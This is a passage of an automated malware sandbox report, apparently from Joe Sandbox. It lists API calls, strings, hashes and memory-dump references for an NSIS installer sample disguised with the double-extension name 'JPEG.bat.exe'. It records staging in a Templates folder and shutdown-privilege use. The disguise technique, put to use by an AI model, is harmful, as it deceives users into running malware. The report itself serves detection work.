CharNextA.USER32(00000000,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",00000020,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 004032E4
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033E1
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004033F2
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033FE
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403412
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040341A
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040342B
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403433
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403447

Part of subcall function 00406302: GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
Part of subcall function 00406302: GetProcAddress.KERNEL32(00000000,?), ref: 0040632F

Part of subcall function 00403798: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244,1033,spidskaalshoved Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,spidskaalshoved Setup: Installing,00000000,00000002,75953410), ref: 00403888
Part of subcall function 00403798: lstrcmpiA.KERNEL32(?,.exe), ref: 0040389B
Part of subcall function 00403798: GetFileAttributesA.KERNEL32(Call), ref: 004038A6
Part of subcall function 00403798: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244), ref: 004038EF
Part of subcall function 00403798: RegisterClassA.USER32(00422EA0), ref: 0040392C

Part of subcall function 004036BE: CloseHandle.KERNEL32(000002D0,004034F5,?,?,00000006,00000008,0000000A), ref: 004036C9

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004034F5
ExitProcess.KERNEL32 ref: 00403516
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403633
OpenProcessToken.ADVAPI32(00000000), ref: 0040363A
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403652
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403671
ExitWindowsEx.USER32(00000002,80040002), ref: 00403695
ExitProcess.KERNEL32 ref: 004036B8

Part of subcall function 00405686: MessageBoxIndirectA.USER32(00409218), ref: 004056E1

Strings

TMP, xrefs: 0040342E
~nsu, xrefs: 00403521
Low, xrefs: 00403414
NSIS Error, xrefs: 00403299
UXTHEME, xrefs: 00403228, 0040322D, 00403233
.tmp, xrefs: 0040353D
"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe", xrefs: 004032AE, 004032B4, 0040346B
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers, xrefs: 004034D2
C:\Users\user\AppData\Local\Temp\, xrefs: 004033D6, 004033DB, 004033F1, 004033FD, 0040340C, 00403419, 00403425, 0040342D, 00403526, 00403537, 00403542, 0040354E, 0040355B, 0040356A, 00403619
1033, xrefs: 00403442
C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe, xrefs: 004035D3
SeShutdownPrivilege, xrefs: 0040364C
\Temp, xrefs: 004033F8
TEMP, xrefs: 00403426
C:\Users\user\Desktop, xrefs: 00403548, 0040354D, 00403579
", xrefs: 00403309
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244, xrefs: 004033C6, 004034C7, 00403571, 0040357A
Error launching installer, xrefs: 004034AD

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers$C:\Users\user\Desktop$C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3776617018-16146374
Opcode ID: 7bcbbf229ff0261bcc06b89522b60a706fee5f29980eef449c06c54d38326c76
Instruction ID: 9e312bc3f5d3d37e61d45afab2cefd1cff230aa7333539c56d086af75f350ab7
Opcode Fuzzy Hash: 7bcbbf229ff0261bcc06b89522b60a706fee5f29980eef449c06c54d38326c76
Instruction Fuzzy Hash: 90C106706082426AE7216F719D4DB2B3EACEB85706F04457FF581B61E2C77C8A05CB2E

Function 004051CF Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040522E
GetDlgItem.USER32(?,000003EE), ref: 0040523D
GetClientRect.USER32(?,?), ref: 0040527A
GetSystemMetrics.USER32(00000002), ref: 00405281
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052A2
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052B3
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C6
SendMessageA.USER32(?,00001026,00000000,?), ref: 004052D4
SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E7
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405309
ShowWindow.USER32(?,00000008), ref: 0040531D
GetDlgItem.USER32(?,000003EC), ref: 0040533E
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040534E
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405367
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405373
GetDlgItem.USER32(?,000003F8), ref: 0040524C

Part of subcall function 0040403E: SendMessageA.USER32(00000028,?,00000001,00403E6E), ref: 0040404C

GetDlgItem.USER32(?,000003EC), ref: 0040538F
CreateThread.KERNELBASE(00000000,00000000,Function_00005163,00000000), ref: 0040539D
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004053A4
ShowWindow.USER32(00000000), ref: 004053C7
ShowWindow.USER32(?,00000008), ref: 004053CE
ShowWindow.USER32(00000008), ref: 00405414
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405448
CreatePopupMenu.USER32 ref: 00405459
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040546E
GetWindowRect.USER32(?,000000FF), ref: 0040548E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A7
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054E3
OpenClipboard.USER32(00000000), ref: 004054F3
EmptyClipboard.USER32 ref: 004054F9
GlobalAlloc.KERNEL32(00000042,?), ref: 00405502
GlobalLock.KERNEL32(00000000), ref: 0040550C
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405520
GlobalUnlock.KERNEL32(00000000), ref: 00405539
SetClipboardData.USER32(00000001,00000000), ref: 00405544
CloseClipboard.USER32 ref: 0040554A

Strings

spidskaalshoved Setup: Installing, xrefs: 004054BF

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: spidskaalshoved Setup: Installing
API String ID: 4154960007-3911443157
Opcode ID: 7d0a8cd8e416168bcdd9cece761f9fa15a968798360528e6a780b83708fc3970
Instruction ID: 0e806a1c10c1a3103ec1b6ff030541c572903ae85d70ab094f2e75f2d1af7317
Opcode Fuzzy Hash: 7d0a8cd8e416168bcdd9cece761f9fa15a968798360528e6a780b83708fc3970
Instruction Fuzzy Hash: ABA15AB1900209BFDB219FA4DD89AAE7F79FB04355F10403AFA04B62A0C7B55E41DF69

Function 00405732 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040575B
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057A3
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057C4
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057CA
FindFirstFileA.KERNELBASE(00420D10,?,?,?,00409014,?,00420D10,?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057DB
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405888
FindClose.KERNEL32(00000000), ref: 00405899

Strings

"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe", xrefs: 00405732
C:\Users\user\AppData\Local\Temp\, xrefs: 0040573F
\*.*, xrefs: 0040579D

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-4260017865
Opcode ID: e4d8cf6358702228609bce022f76a866bb8ad1d2f30bc98f97ca77bbe447c365
Instruction ID: 4530166bbd706fa81c440e6583376772d6fc270faa34d54a03d6882d8fc6be8c
Opcode Fuzzy Hash: e4d8cf6358702228609bce022f76a866bb8ad1d2f30bc98f97ca77bbe447c365
Instruction Fuzzy Hash: 7351B332904A09BADB216B728C45BAF7A78DF42714F14817BF841B11D2D73C8952DEA9

Function 004065F6 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48b772c591d60bd120ceb21c558333e6da892a782e2c7f4c33aa573d96a0a8bb
Instruction ID: 5cdea38fe39661480990cc8a004f6d9d9bf1a0cca829e9caf547f016d39c1b54
Opcode Fuzzy Hash: 48b772c591d60bd120ceb21c558333e6da892a782e2c7f4c33aa573d96a0a8bb
Instruction Fuzzy Hash: 7BF17475D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF44

Function 0040626D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(75953410,00421558,shovel\Undrinking.veg,00405A33,shovel\Undrinking.veg,shovel\Undrinking.veg,00000000,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\), ref: 00406278
FindClose.KERNELBASE(00000000), ref: 00406284

Strings

shovel\Undrinking.veg, xrefs: 0040626D

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: shovel\Undrinking.veg
API String ID: 2295610775-2939288235
Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction ID: 4b5b4fac396428ba6811cbdb79132df6df7f7590a8a38978907140e3512fee8b
Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction Fuzzy Hash: 9AD012319190246BC3402B387D0C84B7B599B553317128B77F96BF16F0C3389C7286EA

Function 00403B35 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B71
ShowWindow.USER32(?), ref: 00403B8E
DestroyWindow.USER32 ref: 00403BA2
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BBE
GetDlgItem.USER32(?,?), ref: 00403BDF
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BF3
IsWindowEnabled.USER32(00000000), ref: 00403BFA
GetDlgItem.USER32(?,00000001), ref: 00403CA8
GetDlgItem.USER32(?,00000002), ref: 00403CB2
SetClassLongA.USER32(?,000000F2,?), ref: 00403CCC
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D1D
GetDlgItem.USER32(?,00000003), ref: 00403DC3
ShowWindow.USER32(00000000,?), ref: 00403DE4
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DF6
EnableWindow.USER32(?,?), ref: 00403E11
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E27
EnableMenuItem.USER32(00000000), ref: 00403E2E
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E46
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E59
lstrlenA.KERNEL32(spidskaalshoved Setup: Installing,?,spidskaalshoved Setup: Installing,00000000), ref: 00403E83
SetWindowTextA.USER32(?,spidskaalshoved Setup: Installing), ref: 00403E92
ShowWindow.USER32(?,0000000A), ref: 00403FC6

Strings

spidskaalshoved Setup: Installing, xrefs: 00403E73, 00403E79, 00403E82, 00403E90

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: spidskaalshoved Setup: Installing
API String ID: 3282139019-3911443157
Opcode ID: 0c1a0b4012b528e3d1e15867ad5d8e725077cdc308248a61195f66e94d999680
Instruction ID: ece9219a4d70184b68c45d6c06b8272552e5c94251c83fd0e936414de4f8c744
Opcode Fuzzy Hash: 0c1a0b4012b528e3d1e15867ad5d8e725077cdc308248a61195f66e94d999680
Instruction Fuzzy Hash: 7AC1C0B1A04205BBDB206F61EE48E2B3E7DFB45706F40453EF601B11E1C779A9429B6E

Function 00403798 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406302: GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
Part of subcall function 00406302: GetProcAddress.KERNEL32(00000000,?), ref: 0040632F

lstrcatA.KERNEL32(1033,spidskaalshoved Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,spidskaalshoved Setup: Installing,00000000,00000002,75953410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",00000000), ref: 00403813
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244,1033,spidskaalshoved Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,spidskaalshoved Setup: Installing,00000000,00000002,75953410), ref: 00403888
lstrcmpiA.KERNEL32(?,.exe), ref: 0040389B
GetFileAttributesA.KERNEL32(Call), ref: 004038A6
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244), ref: 004038EF

Part of subcall function 00405EC8: wsprintfA.USER32 ref: 00405ED5

RegisterClassA.USER32(00422EA0), ref: 0040392C
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403944
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403979
ShowWindow.USER32(00000005,00000000), ref: 004039AF
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039DB
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039E8
RegisterClassA.USER32(00422EA0), ref: 004039F1
DialogBoxParamA.USER32(?,00000000,00403B35,00000000), ref: 00403A10

Strings

.DEFAULT\Control Panel\International, xrefs: 004037FE
RichEdit20A, xrefs: 004039D3, 004039D9
Call, xrefs: 00403856, 0040385E, 0040386B, 004038B5, 004038BB
RichEd32, xrefs: 004039C3
RichEdit, xrefs: 004039E2
Control Panel\Desktop\ResourceLocale, xrefs: 004037CC
spidskaalshoved Setup: Installing, xrefs: 004037C4, 004037CA, 004037EF, 004037F8, 0040380D
.exe, xrefs: 00403895
"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe", xrefs: 0040379C
C:\Users\user\AppData\Local\Temp\, xrefs: 0040379D
1033, xrefs: 004037B8, 0040380E
_Nb, xrefs: 0040390B, 00403973
RichEd20, xrefs: 004039B5
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244, xrefs: 00403822, 0040382A, 004038C2, 004038C8, 004038D8

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$spidskaalshoved Setup: Installing
API String ID: 1975747703-3413598102
Opcode ID: fdd1c6f164d69bb04a2db118324e420eee4596cf25755c9c8f65584aa60a0941
Instruction ID: 22145a8d87807f1e884b2dd2f98424a05527e1b570cf61420d2a276d1199ab18
